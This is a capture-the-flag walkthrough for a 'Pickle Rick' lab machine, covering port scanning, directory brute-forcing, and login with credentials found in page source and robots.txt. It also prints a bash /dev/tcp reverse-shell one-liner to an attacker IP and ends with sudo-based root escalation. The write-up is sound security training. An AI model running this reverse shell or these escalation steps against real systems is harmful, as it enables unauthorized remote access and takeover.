# Pickle Rick ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak3lLkcfDZqHgMXwhi%2F-Mak3qHHNTT7AZXhvntn%2Fimage.png?alt=media\&token=bcfba9bc-5627-4a5d-993a-87d7ee816f4f) ## Reconnaissance Lets start with a initial nmap scan to find open ports ``` nmap -Pn 10.10.249.44 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak4TfZwLVNscIX6F8j%2Fimage.png?alt=media\&token=7378f2c7-2c0d-41de-8ee6-46f343c3fefb) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak4omHkD1umv-62tZ7%2Fimage.png?alt=media\&token=0a602a3d-c3b2-41f9-bfa6-de8537943e19) ## Enumerate ### Port 80 Lets visit the website and look at the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak59ZZL-Ikj9JmPuTb%2Fimage.png?alt=media\&token=477edaf4-8ae4-485e-8861-614714e8e893) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak5Q-ZXa6GTpXhM2x2%2Fimage.png?alt=media\&token=2fe7767d-f86b-4b01-8656-77489108bfe7) Lets add this to our notes, I personally use `gedit` on the kali virtual machine and then transfer all of it to "OneNote" on my host machine and organize it. To use gedit: `gedit ` ``` gedit notes ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak5nz9kY7GB1s-agcK%2F-Mak61bG06dGULZD1sXh%2Fimage.png?alt=media\&token=e6169c59-b59f-44b3-ae42-794dc9456bac) Now lets visit `robots.txt`, usually we find something interesting on this page like hidden directories or even sometimes passwords. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak5nz9kY7GB1s-agcK%2F-Mak6KBdFkykmm5kODbe%2Fimage.png?alt=media\&token=c5a01811-ac7f-47b2-a32f-1c432b3a85ae) This looks interesting, it could probably be a directory, but I tested it and it was not, so it could be a password, so lets save it in our notes. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak6cgMxtHhBIG0rQ4m%2F-Mak6g35NBsY4oW2nle0%2Fimage.png?alt=media\&token=6f58dbf1-ac5b-4381-9dfe-44b7c2f055b0) Now lets run `Gobuster` to see if we can find hidden directories Command Breakdown: * (**-w**): Specifying wordlist * (**-u**): Specifying URL * (**-x**): Specifying extensions ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak6cgMxtHhBIG0rQ4m%2F-Mak7z4ut6o77qoj1e-F%2Fimage.png?alt=media\&token=0121ff36-a966-45e1-86af-1dc08de4c37d) `/login.php` and `/portal.php` were the same page as `/portal.php` redirects us to `/login.php` `/assets` had some Javascript and CSS files which did not look like there were going to help us exploit this machine. Now we found ourselves a login page ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak8c1nHLkBRdh-gUuC%2Fimage.png?alt=media\&token=822790b3-59dd-4db0-b177-e40c649f4785) And if we look at our notes, we have a username and a possible password, lets try using them to login. And we got in!! ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak8pKJXygZciFGyKt4%2Fimage.png?alt=media\&token=8af687fc-ca7d-46ff-b325-a30047b2b695) We have a command panel where we can run some commands, lets explore it. Running `ls`gives us some files present in the current directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak92SwiNO5uhsd1XXP%2Fimage.png?alt=media\&token=2cd0250a-7763-4d0d-8ef2-98c65b56d628) Lets try reading those files ``` cat Sup3rS3cretPickl3Ingred.txt ``` And.... the command is disabled, so what can we do here, if we try different commands we can see that many commands are allowed but `cat` is not allowed. After a lot of searching I found a command that gave us reverse shell on the server. ``` bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1' ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak9VqYXi1QxY8sJ-g1%2F-MakAW5XRYnEICvr7Cd9%2Fimage.png?alt=media\&token=8bd7309d-a271-4424-95f9-7542007621ac) And now we can read the contents of Sup3rS3cretPickl3Ingred.txt. ``` cat Sup3rS3cretPickl3Ingred.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak9VqYXi1QxY8sJ-g1%2F-MakAfFCwS8uks8a9-Kh%2Fimage.png?alt=media\&token=fe6d9472-1bb5-4744-a597-6479962fbd62) This is answer for the first question ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakAotQjh0dgx8boXr2%2Fimage.png?alt=media\&token=3f58bd56-fbdb-4f9e-b7f7-81e9c1ae07f0) Now lets enumerate the machine and find a way to get root ## Privilege Escalation While looking around I found the second ingredient which is the second answer. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBMeygdKVJTasbFEk%2Fimage.png?alt=media\&token=22e4c57a-8729-4fbd-a836-2926c4ae3d72) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakCEM1zhuoGtTV3FUG%2Fimage.png?alt=media\&token=42520f8b-0338-43e1-9382-6bba3ad5aa00) Now lets try to become root to cd into the root directory as I think the final ingredient is hidden there, lets run the command `sudo -l` to see if we can files as other users. ``` sudo -l ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBgSEG-UgzC5x0vAD%2Fimage.png?alt=media\&token=e44ad418-7808-4427-8fa9-286cc62686cc) We are allowed to run ALL, so lets try switching users to root using the command `su` ``` sudo su ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBx2JcRQGxaVslufw%2Fimage.png?alt=media\&token=3bb80b4e-93d1-4868-8d1c-7baca2a1be0b) And we are root! We can also see the 3rd and final ingredient in the root directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakC8pwOhs6g1l05IOj%2Fimage.png?alt=media\&token=3c6faf73-851a-49c9-8fcc-f5d37c80cb11) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakCICyd9MeI-b1yeBi%2Fimage.png?alt=media\&token=451dda23-d0e1-4fd1-a00c-850dbed10edd)